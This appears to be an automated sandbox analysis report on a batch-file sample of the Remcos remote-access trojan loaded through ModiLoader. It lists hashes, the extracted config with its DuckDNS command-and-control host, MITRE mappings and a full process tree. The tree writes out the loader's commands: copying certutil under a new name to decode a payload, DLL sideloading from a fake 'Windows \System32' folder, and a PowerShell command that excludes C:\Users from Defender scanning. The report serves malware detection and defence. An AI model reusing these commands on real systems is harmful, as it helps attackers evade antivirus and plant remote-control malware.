Analysis

  • max time kernel
    299s
  • max time network
    293s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-04-2024 21:02

General

  • Target

    851b1f4779b2875dcbb966c5c062d4766655c3d5d94693c93b33ec66fcd8f208.bat

  • Size

    3.2MB

  • MD5

    b766a151851fff661fd05df17c722fe0

  • SHA1

    b72ca0ded29114b5d4f333e2c8d32f37f075c059

  • SHA256

    851b1f4779b2875dcbb966c5c062d4766655c3d5d94693c93b33ec66fcd8f208

  • SHA512

    1940cf3c9b83c4298d6beffc612657e379073dfce854b14306919d5fe8a73c888906cdeebdb7803f3ab5ae41a44a0b04fc2520d675dc9ebd253dce4ad0faae60

  • SSDEEP

    49152:Xf2itfXve4rdS832GjhZqBaN6y3L8boHHTA0:Z

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

jaztc.duckdns.org:1808

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    sfsfdrgrre

  • mouse_option

    false

  • mutex

    Rmc-AJ5P19

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • ModiLoader Second Stage 1 IoCs
  • Executes dropped EXE 9 IoCs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 53 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\851b1f4779b2875dcbb966c5c062d4766655c3d5d94693c93b33ec66fcd8f208.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:928
    • C:\Windows\System32\extrac32.exe
      C:\\Windows\\System32\\extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
      2⤵
        PID:3516
      • C:\Users\Public\alpha.exe
        C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
        2⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1016
        • C:\Windows\system32\extrac32.exe
          extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
          3⤵
            PID:3620
        • C:\Users\Public\alpha.exe
          C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\851b1f4779b2875dcbb966c5c062d4766655c3d5d94693c93b33ec66fcd8f208.bat" "C:\\Users\\Public\\Yano.txt" 9
          2⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:1716
          • C:\Users\Public\kn.exe
            C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\851b1f4779b2875dcbb966c5c062d4766655c3d5d94693c93b33ec66fcd8f208.bat" "C:\\Users\\Public\\Yano.txt" 9
            3⤵
            • Executes dropped EXE
            PID:3928
        • C:\Users\Public\alpha.exe
          C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Yano.txt" "C:\\Users\\Public\\Libraries\\Yano.com" 12
          2⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:3012
          • C:\Users\Public\kn.exe
            C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Yano.txt" "C:\\Users\\Public\\Libraries\\Yano.com" 12
            3⤵
            • Executes dropped EXE
            PID:1488
        • C:\Users\Public\Libraries\Yano.com
          C:\Users\Public\Libraries\Yano.com
          2⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:228
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\AprfgvrzO.bat" "
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3832
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
              4⤵
                PID:4996
              • C:\Windows\SysWOW64\xcopy.exe
                xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y
                4⤵
                • Enumerates system info in registry
                PID:2560
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
                4⤵
                  PID:4472
                • C:\Windows\SysWOW64\xcopy.exe
                  xcopy "Aaa.bat" "C:\Windows \System32\" /K /D /H /Y
                  4⤵
                  • Enumerates system info in registry
                  PID:4696
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
                  4⤵
                    PID:3644
                  • C:\Windows\SysWOW64\xcopy.exe
                    xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y
                    4⤵
                    • Enumerates system info in registry
                    PID:592
                  • C:\Windows \System32\easinvoker.exe
                    "C:\Windows \System32\easinvoker.exe"
                    4⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of WriteProcessMemory
                    PID:2976
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c ""C:\windows \system32\aaa.bat""
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3100
                      • C:\Windows\system32\cmd.exe
                        cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                        6⤵
                        • Suspicious use of WriteProcessMemory
                        PID:1180
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                          7⤵
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1420
                • C:\Windows\SysWOW64\extrac32.exe
                  C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\Yano.com C:\\Users\\Public\\Libraries\\Aprfgvrz.PIF
                  3⤵
                    PID:3968
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c del "C:\Users\Public\Yano.txt" / A / F / Q / S
                  2⤵
                  • Executes dropped EXE
                  PID:4704
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S
                  2⤵
                  • Executes dropped EXE
                  PID:4504

              Network

              MITRE ATT&CK Matrix ATT&CK v13

              Persistence

              Boot or Logon Autostart Execution

              1
              T1547

              Registry Run Keys / Startup Folder

              1
              T1547.001

              Privilege Escalation

              Boot or Logon Autostart Execution

              1
              T1547

              Registry Run Keys / Startup Folder

              1
              T1547.001

              Defense Evasion

              Modify Registry

              1
              T1112

              Discovery

              Query Registry

              1
              T1012

              System Information Discovery

              1
              T1082

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\ProgramData\sfsfdrgrre\logs.dat
                Filesize

                144B

                MD5

                893868201045c14edf97799973e6ee4f

                SHA1

                75c90bde31032859b27350eac21043cf944b720a

                SHA256

                506f0435380672033687bfb22bd2112c267a0b6f63f62aab4e01d6cc6d101abd

                SHA512

                a08da085a6bda07e465f30b578aa137cabe912db0c75c7d31ea60890b9377981f60f9393d0dccb0b616f893682127a3e3e9c4003ebc6258cfa9bc563cb86a93b

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3uzxjens.pd3.ps1
                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              • C:\Users\Public\Libraries\AprfgvrzO.bat
                Filesize

                29KB

                MD5

                828ffbf60677999579dafe4bf3919c63

                SHA1

                a0d159a1b9a49e9eaccc53fe0c3266c0526a1bdc

                SHA256

                abac4a967800f5da708572ec42441ec373cd52459a83a8a382d6b8579482789d

                SHA512

                bf00909e24c5a6fb2346e8457a9adacd5f1b35988d90abbde9ff26896bbb59edafea60d9db4d10182a7b5e129bb69585d3e20bc5c63af3517b3a7ef1e45ffb7e

              • C:\Users\Public\Libraries\Yano.com
                Filesize

                1.2MB

                MD5

                6e81d417826597c23f59c6dc8d0e9325

                SHA1

                6b8f936e6d7249471d1acdf5e3ec50faea11211a

                SHA256

                92286b5317d643787e4109d2d7354e94593416720d0b8f8aa2d497a16a24f377

                SHA512

                37dfc57c6ada7b379150c1085dcef8b01b4e950f011bc45f50889c883ff28d33a0be4fb0a66f1b1a8d862a6e37dcaf1f810b66bd094b7baff5cfb8f041d198cc

              • C:\Users\Public\Libraries\aaa.bat
                Filesize

                18KB

                MD5

                f4e8f0ec6cfc5c6039402322685cb6ce

                SHA1

                1037835573c2886dda05d256f15306da89dc645e

                SHA256

                cd05094e213643d624996b98e14aa5f7a2363f63530fe0c99523f6948effe756

                SHA512

                c5f9dfbbdb437c8ef9e2dd53fcbafcb256ab4626b4637a21332b3112c20f0d5353674031aae21b57604ba80d3b3f51f11b0ed412ed5fa6641b32fc4793746e02

              • C:\Users\Public\Libraries\easinvoker.exe
                Filesize

                128KB

                MD5

                231ce1e1d7d98b44371ffff407d68b59

                SHA1

                25510d0f6353dbf0c9f72fc880de7585e34b28ff

                SHA256

                30951db8bfc21640645aa9144cfeaa294bb7c6980ef236d28552b6f4f3f92a96

                SHA512

                520887b01bda96b7c4f91b9330a5c03a12f7c7f266d4359432e7bacc76b0eef377c05a4361f8fa80ad0b94b5865699d747a5d94a2d3dcdb85dabf5887bb6c612

              • C:\Users\Public\Libraries\netutils.dll
                Filesize

                112KB

                MD5

                30468939b69d5b1f29494fff5b161e6b

                SHA1

                3f900a76e5a00efd97c618c8cdaa55e66384618f

                SHA256

                7c6b2128913876dcb70603f2c00618d2e9057f381766565baf2a37100b85f1fd

                SHA512

                f59fc26b77b28bc0dce41f2542c95a0fcb32204cc2d840d7cf8e74e10fbfc238f0c360e3bb5d787f32c83668ad10bbe522e098ede52f178dd8555c7af530f27f

              • C:\Users\Public\Yano.txt
                Filesize

                2.3MB

                MD5

                4cf5c11880ee66463fbbbd2d00371d09

                SHA1

                9c438f3129d126279e62d738ced076daf88090af

                SHA256

                47b157a5a99f3304a954236dd5f85978bd8dfb8a741abefd2798dfc2b2e2a8c7

                SHA512

                0915ee260c1e625779b7036c049bd2aafc43852d5585f3674bebca41189025db9c13d9cc4543fde579f61128c815107b5d765cc45e24e4f109f4aaf41038a9ce

              • C:\Users\Public\alpha.exe
                Filesize

                283KB

                MD5

                8a2122e8162dbef04694b9c3e0b6cdee

                SHA1

                f1efb0fddc156e4c61c5f78a54700e4e7984d55d

                SHA256

                b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

                SHA512

                99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

              • C:\Users\Public\kn.exe
                Filesize

                1.6MB

                MD5

                bd8d9943a9b1def98eb83e0fa48796c2

                SHA1

                70e89852f023ab7cde0173eda1208dbb580f1e4f

                SHA256

                8de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2

                SHA512

                95630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b

              • memory/228-78-0x0000000014F00000-0x0000000015F00000-memory.dmp
                Filesize

                16.0MB

              • memory/228-89-0x0000000014F00000-0x0000000015F00000-memory.dmp
                Filesize

                16.0MB

              • memory/228-178-0x0000000014F00000-0x0000000015F00000-memory.dmp
                Filesize

                16.0MB

              • memory/228-177-0x0000000014F00000-0x0000000015F00000-memory.dmp
                Filesize

                16.0MB

              • memory/228-30-0x0000000002910000-0x0000000003910000-memory.dmp
                Filesize

                16.0MB

              • memory/228-167-0x0000000014F00000-0x0000000015F00000-memory.dmp
                Filesize

                16.0MB

              • memory/228-166-0x0000000014F00000-0x0000000015F00000-memory.dmp
                Filesize

                16.0MB

              • memory/228-156-0x0000000014F00000-0x0000000015F00000-memory.dmp
                Filesize

                16.0MB

              • memory/228-155-0x0000000014F00000-0x0000000015F00000-memory.dmp
                Filesize

                16.0MB

              • memory/228-74-0x0000000014F00000-0x0000000015F00000-memory.dmp
                Filesize

                16.0MB

              • memory/228-76-0x0000000014F00000-0x0000000015F00000-memory.dmp
                Filesize

                16.0MB

              • memory/228-77-0x0000000014F00000-0x0000000015F00000-memory.dmp
                Filesize

                16.0MB

              • memory/228-29-0x0000000002910000-0x0000000003910000-memory.dmp
                Filesize

                16.0MB

              • memory/228-79-0x0000000014F00000-0x0000000015F00000-memory.dmp
                Filesize

                16.0MB

              • memory/228-80-0x0000000014F00000-0x0000000015F00000-memory.dmp
                Filesize

                16.0MB

              • memory/228-81-0x0000000014F00000-0x0000000015F00000-memory.dmp
                Filesize

                16.0MB

              • memory/228-83-0x0000000014F00000-0x0000000015F00000-memory.dmp
                Filesize

                16.0MB

              • memory/228-32-0x0000000000400000-0x0000000000531000-memory.dmp
                Filesize

                1.2MB

              • memory/228-90-0x0000000014F00000-0x0000000015F00000-memory.dmp
                Filesize

                16.0MB

              • memory/228-28-0x0000000000A30000-0x0000000000A31000-memory.dmp
                Filesize

                4KB

              • memory/228-100-0x0000000014F00000-0x0000000015F00000-memory.dmp
                Filesize

                16.0MB

              • memory/228-101-0x0000000014F00000-0x0000000015F00000-memory.dmp
                Filesize

                16.0MB

              • memory/228-111-0x0000000014F00000-0x0000000015F00000-memory.dmp
                Filesize

                16.0MB

              • memory/228-112-0x0000000014F00000-0x0000000015F00000-memory.dmp
                Filesize

                16.0MB

              • memory/228-122-0x0000000014F00000-0x0000000015F00000-memory.dmp
                Filesize

                16.0MB

              • memory/228-123-0x0000000014F00000-0x0000000015F00000-memory.dmp
                Filesize

                16.0MB

              • memory/228-133-0x0000000014F00000-0x0000000015F00000-memory.dmp
                Filesize

                16.0MB

              • memory/228-134-0x0000000014F00000-0x0000000015F00000-memory.dmp
                Filesize

                16.0MB

              • memory/228-144-0x0000000014F00000-0x0000000015F00000-memory.dmp
                Filesize

                16.0MB

              • memory/228-145-0x0000000014F00000-0x0000000015F00000-memory.dmp
                Filesize

                16.0MB

              • memory/1420-69-0x00007FFA2B460000-0x00007FFA2BF21000-memory.dmp
                Filesize

                10.8MB

              • memory/1420-66-0x0000013F38750000-0x0000013F38760000-memory.dmp
                Filesize

                64KB

              • memory/1420-65-0x0000013F38750000-0x0000013F38760000-memory.dmp
                Filesize

                64KB

              • memory/1420-64-0x00007FFA2B460000-0x00007FFA2BF21000-memory.dmp
                Filesize

                10.8MB

              • memory/1420-59-0x0000013F3A8D0000-0x0000013F3A8F2000-memory.dmp
                Filesize

                136KB

              • memory/2976-52-0x00000000613C0000-0x00000000613E3000-memory.dmp
                Filesize

                140KB